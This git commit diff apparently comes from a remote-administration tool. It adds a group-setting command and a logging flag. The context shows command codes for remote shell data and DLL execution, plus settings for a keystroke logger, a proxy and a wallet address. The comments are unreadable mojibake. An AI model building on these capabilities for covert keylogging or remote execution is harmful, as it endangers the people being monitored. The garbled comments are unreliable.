Feature: Complete re-group logic and add log control

This commit is contained in:
yuanyuanxiang
2025-12-17 23:07:54 +01:00
parent 23564ef19f
commit 602997082e
7 changed files with 52 additions and 3 deletions

View File

@@ -269,6 +269,7 @@ enum {
TOKEN_SHELL_DATA = 231, // <20>ն˽<D5B6><CBBD><EFBFBD>
CMD_EXECUTE_DLL = 240, // ִ<>д<EFBFBD><D0B4><EFBFBD>
TOKEN_CLIENT_MSG = 241, // <20>ͻ<EFBFBD><CDBB><EFBFBD><EFBFBD><EFBFBD>Ϣ
CMD_SET_GROUP = 242, // <20>޸ķ<DEB8><C4B7><EFBFBD>
};
enum MachineCommand {
@@ -890,7 +891,8 @@ typedef struct MasterSettings {
int UsingFRPProxy; // <20>Ƿ<EFBFBD>ʹ<EFBFBD><CAB9>FRP<52><50><EFBFBD><EFBFBD>
char WalletAddress[472]; // Wallets
int EnableKBLogger; // Since 2025-11-27
char Reserved[496]; // Since 2025-11-27
int EnableLog; // Since 2025-12-17
char Reserved[492]; // Since 2025-11-27
} MasterSettings;
#define MasterSettingsOldSize 500